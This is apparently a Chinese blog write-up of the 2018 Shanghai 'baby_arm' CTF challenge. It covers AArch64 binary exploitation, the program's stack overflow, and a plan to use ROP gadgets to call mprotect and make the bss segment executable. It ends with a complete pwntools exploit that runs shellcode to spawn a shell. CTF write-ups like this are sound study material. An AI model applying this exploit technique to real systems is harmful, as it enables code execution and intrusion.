Aarch64_Pwn初探

Arm Pwn 初体验

Example

2018上海大学生网络安全赛 baby_arm

checksec

1
2
3
4
5
6
[*] '/home/tty18pwn/Desktop/baby_arm/pwn'
    Arch:     aarch64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

开启了NX

Aarch64 Registers

Analysis

1
2
3
4
5
6
7
8
__int64 main()
{
  init();
  write(1LL, "Name:", 5LL);
  read(0LL, &bss_var, 0x200LL);
  vuln();
  return 0LL;
}
1
2
3
4
5
6
ssize_t vuln()
{
  __int64 v1; // [xsp+10h] [xbp+10h]

  return read(0, &v1, 0x200uLL);
}

很明显的栈溢出,但是由于没有现成的后门,而且开启了NX,所以需要绕过

所幸程序 提供了.mprotect, 该函数把以start地址开始的、长度为len的内存区的保护属性修改为prot指定的值 。bss段本来是不可执行的,我们可以改成可执行。IDA中看到bss_var地址为0x0411068,从这开始改就行

利用思路:

  1. 将shellcode写入bss段
  2. 通过栈溢出劫持控制流调用mprotect打开bss段权限
  3. rop调转到之前bss变量的地址去执行shellcode

由于用寄存器传参,x86-64中需要寻找pop rdi; ret这种gadgets来劫持参数。arm中同样, X0~X7寄存器用于传递子程序参数,多余参数才采用堆栈传递 。可以通过ROPgadget --binary pwn --only "ldp|ret"来寻找gadgets。

下列函数都有gadgets可用

  1. _init
  2. _start
  3. call_gmon_start
  4. deregister_tm_clones
  5. register_tm_clones
  6. __do_global_dtors_aux
  7. frame_dummy
  8. __libc_csu_init
  9. __libc_csu_fini
  10. _fini

Exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# exp.py
from pwn import *

context.arch = 'aarch64'
context.log_level = 'debug'
context.timeout = 1
elf = ELF('./pwn')
io = process(['qemu-aarch64', '-L', '/usr/aarch64-linux-gnu/', './pwn'])
#io = process(['qemu-aarch64', '-g', '1234', '-L', '/usr/aarch64-linux-gnu/', './pwn'])
#io = remote('node3.buuoj.cn',28102)

shellcode = asm(shellcraft.aarch64.linux.sh())

part1 = 0x4008cc
part2 = 0x4008ac
#io.recvuntil()

payload = p64(elf.plt['mprotect']) + shellcode
payload.ljust(0x200, '\x00')
io.sendlineafter('Name:',payload)

payload2 = p64(part1)
payload2 += p64(0xdeadbeef)
payload2 += p64(part2)
payload2 += p64(0x1)
payload2 += p64(0x2)

payload2 += p64(0x411068 - 8) # ptr to mprotect@plt
payload2 += p64(7) #x2
payload2 += p64(0x1000) #x1
payload2 += p64(0x411000 )#x0
#mprotect(0x411000, 0x1000, 7)
payload2 += p64(0xdeadbeef)
payload2 += p64(0x411068 + 8) # shellcode addr

payload = 'A'*64 + p64(elf.bss()) + payload2
payload += cyclic(0x200 - len(payload)) 
io.sendline(payload)

io.interactive()

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

江南大学通信工程在读本科生;江南大学信息安全俱乐部19级成员、现任俱乐部负责人;SU现役成员